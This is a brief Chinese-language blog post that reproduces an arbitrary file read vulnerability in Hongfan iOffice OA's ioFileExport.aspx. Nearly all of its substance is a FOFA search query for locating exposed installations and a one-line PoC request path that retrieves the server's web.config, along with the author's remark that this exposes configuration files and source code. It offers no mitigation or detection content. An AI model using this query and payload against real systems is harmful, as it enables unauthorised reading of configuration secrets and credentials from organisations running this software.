【漏洞复现】 红帆OA ioFileExport.aspx 任意文件读取漏洞
现在写漏洞复现也加个标签好了,漏洞原理也加标签,以后便于分辨。但是还是那句话,心情不好来搞网安就对了。今天随便找个漏洞来进行浮现,漏洞原理我就不深究了,主要是体验一下拿到漏洞的那种快感。
fofa语句
fofa:app="红帆-ioffice"
poc
执行POC得到配置文件、源码等信息
1 | /ioffice/prg/set/iocom/ioFileExport.aspx?url=/ioffice/web.config&filename=test.txt&ContentType=application/octet-stream |
复现成功
(后面倒是可以来看看)